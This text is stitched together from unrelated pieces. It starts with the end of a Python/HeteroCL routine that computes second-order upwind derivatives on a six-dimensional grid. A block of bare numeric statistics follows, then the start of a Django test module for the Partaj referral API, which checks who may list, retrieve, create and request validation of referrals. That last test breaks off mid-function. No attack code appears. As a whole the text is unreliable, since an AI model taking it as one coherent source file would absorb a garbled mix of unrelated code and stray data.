D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(k == V.shape[dim_idx] - 1):
u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_minus_1 = V[i, j, k - 1, l, m, n]
u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
D1_i_plus_half = (u_i_plus_1[0] - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1[0]) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(k == V.shape[dim_idx] - 2):
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_plus_1 = V[i, j, k + 1, l, m, n]
u_i_minus_1 = V[i, j, k - 1, l, m, n]
u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
u_i_minus_1 = V[i, j, k - 1, l, m, n]
u_i_plus_1 = V[i, j, k + 1, l, m, n]
u_i_plus_2 = V[i, j, k + 2, l, m, n]
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
return left_deriv[0], right_deriv[0]
def secondOrderX2_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
left_deriv = hcl.scalar(0, "left_deriv")
right_deriv = hcl.scalar(0, "right_deriv")
dim_idx = 1
u_i = V[i, j, k, l, m, n]
with hcl.if_(j == 0):
u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
u_i_plus_1 = V[i, j + 1, k, l, m, n]
u_i_plus_2 = V[i, j + 2, k, l, m, n]
u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1[0]) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(j == V.shape[dim_idx] - 1):
u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_minus_1 = V[i, j - 1, k, l, m, n]
u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
D1_i_plus_half = (u_i_plus_1[0] - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1[0]) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(j == V.shape[dim_idx] - 2):
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_plus_1 = V[i, j + 1, k, l, m, n]
u_i_minus_1 = V[i, j - 1, k, l, m, n]
u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
u_i_minus_1 = V[i, j - 1, k, l, m, n]
u_i_plus_1 = V[i, j + 1, k, l, m, n]
u_i_plus_2 = V[i, j + 2, k, l, m, n]
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
return left_deriv[0], right_deriv[0]
def secondOrderX1_6d(i, j, k, l, m, n, V, g): # Left -> right == Outer Most -> Inner Most
left_deriv = hcl.scalar(0, "left_deriv")
right_deriv = hcl.scalar(0, "right_deriv")
dim_idx = 0
u_i = V[i, j, k, l, m, n]
with hcl.if_(i == 0):
u_i_minus_1 = hcl.scalar(0, "u_i_minus_1")
u_i_plus_1 = V[i + 1, j, k, l, m, n]
u_i_plus_2 = V[i + 2, j, k, l, m, n]
u_i_minus_1[0] = u_i + my_abs(u_i_plus_1 - u_i) * my_sign(u_i)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1[0]) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(i == V.shape[dim_idx] - 1):
u_i_plus_1 = hcl.scalar(0, "u_i_plus_1")
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_minus_1 = V[i - 1, j, k, l, m, n]
u_i_plus_1[0] = u_i + my_abs(u_i - u_i_minus_1) * my_sign(u_i)
u_i_plus_2[0] = u_i_plus_1[0] + my_abs(u_i_plus_1[0] - u_i) * my_sign(u_i_plus_1[0])
D1_i_plus_half = (u_i_plus_1[0] - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1[0]) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.elif_(i == V.shape[dim_idx] - 2):
u_i_plus_2 = hcl.scalar(0, "u_i_plus_2")
u_i_plus_1 = V[i + 1, j, k, l, m, n]
u_i_minus_1 = V[i - 1, j, k, l, m, n]
u_i_plus_2[0] = u_i_plus_1 + my_abs(u_i_plus_1 - u_i) * my_sign(u_i_plus_1)
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2[0]
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
u_i_minus_1 = V[i - 1, j, k, l, m, n]
u_i_plus_1 = V[i + 1, j, k, l, m, n]
u_i_plus_2 = V[i + 2, j, k, l, m, n]
D1_i_plus_half = (u_i_plus_1 - u_i) / g.dx[dim_idx]
D1_i_minus_half = (u_i - u_i_minus_1) / g.dx[dim_idx]
Q1d_left = D1_i_minus_half
Q1d_right = D1_i_plus_half
D2_i = 0.5 * ((D1_i_plus_half - D1_i_minus_half) / g.dx[dim_idx])
u_i_plus_1_plus_1 = u_i_plus_2
D1_i_plus_1_plus_half = (u_i_plus_1_plus_1 - u_i_plus_1) / g.dx[dim_idx]
D1_i_plus_1_minus_half = D1_i_plus_half
D2_i_plus_1 = 0.5 * ((D1_i_plus_1_plus_half - D1_i_plus_1_minus_half) / g.dx[dim_idx])
with hcl.if_(my_abs(D2_i) <= my_abs(D2_i_plus_1)):
c = D2_i
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
with hcl.else_():
c = D2_i_plus_1
Q2d = c * g.dx[dim_idx]
left_deriv[0] = Q1d_left + Q2d
right_deriv[0] = Q1d_right - Q2d
return left_deriv[0], right_deriv[0]
| 33.140659
| 94
| 0.575734
| 6,131
| 30,158
| 2.335834
| 0.009623
| 0.17806
| 0.143286
| 0.08505
| 0.98785
| 0.98771
| 0.98771
| 0.98771
| 0.98771
| 0.98771
| 0
| 0.076949
| 0.301479
| 30,158
| 909
| 95
| 33.177118
| 0.602867
| 0.009152
| 0
| 0.947883
| 0
| 0
| 0.012477
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009772
| false
| 0
| 0.003257
| 0
| 0.022801
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
424ad03205783d7207b0eea425684ccc9ed6fcab
| 174,307
|
py
|
Python
|
src/backend/tests/partaj/core/test_api_referral.py
|
MTES-MCT/partaj
|
0025c17a96d9212430d18ec36f6a2474c4609738
|
[
"MIT"
] | 2
|
2020-10-15T11:28:26.000Z
|
2021-06-25T15:24:33.000Z
|
src/backend/tests/partaj/core/test_api_referral.py
|
MTES-MCT/partaj
|
0025c17a96d9212430d18ec36f6a2474c4609738
|
[
"MIT"
] | 7
|
2020-10-01T14:49:51.000Z
|
2022-01-24T09:44:10.000Z
|
src/backend/tests/partaj/core/test_api_referral.py
|
MTES-MCT/partaj
|
0025c17a96d9212430d18ec36f6a2474c4609738
|
[
"MIT"
] | 3
|
2020-03-18T15:53:26.000Z
|
2021-09-16T14:39:27.000Z
|
from datetime import datetime, timedelta
from io import BytesIO
from unittest import mock
import uuid
from django.conf import settings
from django.db import transaction
from django.test import TestCase
from django.utils import dateformat
from rest_framework.authtoken.models import Token
from partaj.core import factories, models
@mock.patch("partaj.core.email.Mailer.send")
class ReferralApiTestCase(TestCase):
"""
Test API routes and actions related to Referral endpoints.
"""
# LIST TESTS
def test_list_referrals_by_anonymous_user(self, _):
"""
LIST requests for referrals are not allowed.
"""
response = self.client.get("/api/referrals/")
self.assertEqual(response.status_code, 401)
def test_list_referrals_by_random_logged_in_user(self, _):
"""
LIST requests for referrals are not allowed.
"""
user = factories.UserFactory()
response = self.client.get(
"/api/referrals/",
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
# RETRIEVE TESTS
def test_retrieve_referral_by_anonymous_user(self, _):
"""
Anonymous users cannot get a referral with the retrieve endpoint.
"""
referral = factories.ReferralFactory()
response = self.client.get(f"/api/referrals/{referral.id}/")
self.assertEqual(response.status_code, 401)
def test_retrieve_referral_by_random_logged_in_user(self, _):
"""
Any random logged in user cannot get a referral with the retrieve endpoint.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory()
response = self.client.get(
f"/api/referrals/{referral.id}/",
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
def test_retrieve_referral_by_linked_user(self, _):
"""
The user who created the referral can retrieve it on the retrieve endpoint.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(user=user)
response = self.client.get(
f"/api/referrals/{referral.id}/",
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["id"], referral.id)
def test_retrieve_referral_by_linked_unit_member(self, _):
"""
Members of the linked unit (through topic) can retrieve the referral.
"""
user = factories.UserFactory()
referral_urgency = factories.ReferralUrgencyFactory(duration=timedelta(days=7))
with mock.patch(
"django.utils.timezone.now",
mock.Mock(return_value=datetime(2019, 9, 3, 11, 15, 0)),
):
referral = factories.ReferralFactory(urgency_level=referral_urgency)
referral.units.get().members.add(user)
response = self.client.get(
f"/api/referrals/{referral.id}/",
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["id"], referral.id)
# Make sure the urgency level and expected date are matching
self.assertEqual(
response.json()["urgency_level"],
{
"duration": "7 00:00:00",
"id": referral_urgency.id,
"is_default": referral_urgency.is_default,
"name": referral_urgency.name,
"requires_justification": referral_urgency.requires_justification,
},
)
self.assertEqual(response.json()["created_at"], "2019-09-03T11:15:00Z")
self.assertEqual(response.json()["due_date"], "2019-09-10T11:15:00Z")
# CREATE TESTS
def test_create_referral_by_anonymous_user(self, _):
"""
Anonymous users cannot create a referral.
"""
topic = factories.TopicFactory()
form_data = {
"context": "le contexte",
"prior_work": "le travail préalable",
"question": "la question posée",
"requester": "le demandeur ou la demandeuse",
"topic": str(topic.id),
}
response = self.client.post(
"/api/referrals/",
form_data,
)
self.assertEqual(response.status_code, 401)
def test_create_referral_by_random_logged_in_user(self, _):
"""
Any logged-in user can create a referral using the CREATE endpoint.
"""
topic = factories.TopicFactory()
urgency_level = factories.ReferralUrgencyFactory()
user = factories.UserFactory()
file1 = BytesIO(b"firstfile")
file1.name = "the first file name"
file2 = BytesIO(b"secondfile")
file2.name = "the second file name"
form_data = {
"context": "le contexte",
"files": (file1, file2),
"object": "l'objet de cette saisine",
"prior_work": "le travail préalable",
"question": "la question posée",
"requester": "le demandeur ou la demandeuse",
"topic": str(topic.id),
"urgency_level": urgency_level.id,
"urgency_explanation": "la justification de l'urgence",
}
response = self.client.post(
"/api/referrals/",
form_data,
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 201)
referral = models.Referral.objects.get(id=response.json()["id"])
# All simple fields match the incoming request
self.assertEqual(referral.context, "le contexte")
self.assertEqual(referral.object, "l'objet de cette saisine")
self.assertEqual(referral.prior_work, "le travail préalable")
self.assertEqual(referral.question, "la question posée")
self.assertEqual(referral.requester, "le demandeur ou la demandeuse")
self.assertEqual(referral.urgency_level, urgency_level)
self.assertEqual(referral.urgency_explanation, "la justification de l'urgence")
# The correct foreign keys were added to the referral
self.assertEqual(referral.topic, topic)
self.assertEqual(referral.user, user)
self.assertEqual(referral.units.count(), 1)
self.assertEqual(referral.units.first(), topic.unit)
# The attachments for the referral were created and linked with it
self.assertEqual(referral.attachments.count(), 2)
self.assertEqual(referral.attachments.all()[0].file.read(), b"firstfile")
self.assertEqual(referral.attachments.all()[0].name, "the first file name")
self.assertEqual(referral.attachments.all()[1].file.read(), b"secondfile")
self.assertEqual(referral.attachments.all()[1].name, "the second file name")
# The "create" activity for the Referral is generated
activities = models.ReferralActivity.objects.filter(referral__id=referral.id)
self.assertEqual(len(activities), 1)
self.assertEqual(activities[0].referral, referral)
self.assertEqual(activities[0].actor, user)
self.assertEqual(activities[0].verb, models.ReferralActivityVerb.CREATED)
def test_create_referral_by_random_logged_in_user_with_invalid_form(self, _):
"""
If the form is invalid (for example, missing a required field), referral creation
should fail.
"""
user = factories.UserFactory()
topic = factories.TopicFactory()
form_data = {
"context": "le contexte",
"prior_work": "le travail préalable",
"requester": "le demandeur ou la demandeuse",
"topic": str(topic.id),
"urgency": models.Referral.URGENCY_2,
"urgency_explanation": "la justification de l'urgence",
}
response = self.client.post(
"/api/referrals/",
form_data,
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"question": ["Ce champ est obligatoire."]},
)
# REQUEST ANSWER VALIDATION TESTS
def test_referral_request_answer_validation_by_anonymous_user(
self, mock_mailer_send
):
"""
Anonymous users cannot request a validation on an answer for a referral.
"""
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
)
self.assertEqual(response.status_code, 401)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_by_random_logged_in_user(
self, mock_mailer_send
):
"""
Any random logged in user cannot request a validation on an answer for a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_by_linked_user(self, mock_mailer_send):
"""
The linked user cannot request a validation on an answer for a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(
state=models.ReferralState.PROCESSING, user=user
)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 403)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.PROCESSING)
mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_by_linked_unit_member(
self, mock_mailer_send
):
"""
Linked unit members can request a validation on an answer for a referral.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 200)
self.assertEqual(response.json()["state"], models.ReferralState.IN_VALIDATION)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 1)
# Make sure the validation request was built with the data we expect
validation_request = models.ReferralAnswerValidationRequest.objects.get(
answer=answer,
validator=validator,
)
# An activity was created for this validation request
self.assertEqual(
models.ReferralActivity.objects.get(
verb=models.ReferralActivityVerb.VALIDATION_REQUESTED
).item_content_object.id,
validation_request.id,
)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_called_with(
{
"params": {
"case_number": referral.id,
"created_by": user.get_full_name(),
"link_to_referral": (
f"https://partaj/app/unit/{referral.units.get().id}"
f"/referrals-list/referral-detail/{referral.id}"
),
"requester": referral.requester,
"topic": referral.topic.name,
"unit_name": referral.units.get().name,
},
"replyTo": {"email": "contact@partaj.beta.gouv.fr", "name": "Partaj"},
"templateId": settings.SENDINBLUE[
"REFERRAL_ANSWER_VALIDATION_REQUESTED_TEMPLATE_ID"
],
"to": [{"email": validator.email}],
}
)
def test_referral_request_duplicate_answer_validation(self, mock_mailer_send):
"""
An error should be raised if a user attempts to request a validation for an answer from
a user who was already requested one.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
validator = factories.UserFactory(first_name="Alfred", last_name="Borden")
# Create an existing validation request for the same answer and validator
factories.ReferralAnswerValidationRequestFactory(
answer=answer, validator=validator
)
self.assertEqual(
models.ReferralAnswerValidationRequest.objects.all().count(), 1
)
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": answer.id, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json(),
{"errors": ["Alfred Borden was already requested to validate this answer"]},
)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 1)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_not_called()
def test_referral_request_nonexistent_answer_validation_by_linked_unit_member(
self, mock_mailer_send
):
"""
An explicit error is raised when a unit member attempts to request a validation for an
answer that does not exist.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.IN_VALIDATION)
referral.units.get().members.add(user)
random_uuid = uuid.uuid4()
validator = factories.UserFactory()
response = self.client.post(
f"/api/referrals/{referral.id}/request_answer_validation/",
{"answer": random_uuid, "validator": validator.id},
HTTP_AUTHORIZATION=f"Token {Token.objects.get_or_create(user=user)[0]}",
)
self.assertEqual(response.status_code, 400)
self.assertEqual(
response.json()["errors"], [f"answer {random_uuid} does not exist"]
)
self.assertEqual(models.ReferralAnswerValidationRequest.objects.count(), 0)
self.assertEqual(models.ReferralActivity.objects.count(), 0)
referral.refresh_from_db()
self.assertEqual(referral.state, models.ReferralState.IN_VALIDATION)
mock_mailer_send.assert_not_called()
def test_referral_request_answer_validation_by_linked_unit_member_from_nonexistent_user(
self, mock_mailer_send
):
"""
An explicit error is raised when a unit member attempts to request a validation from a
user that does not exist.
"""
user = factories.UserFactory()
referral = factories.ReferralFactory(state=models.ReferralState.PROCESSING)
answer = factories.ReferralAnswerFactory(
referral=referral,
state=models.ReferralAnswerState.DRAFT,
)
referral.units.get().members.add(user)
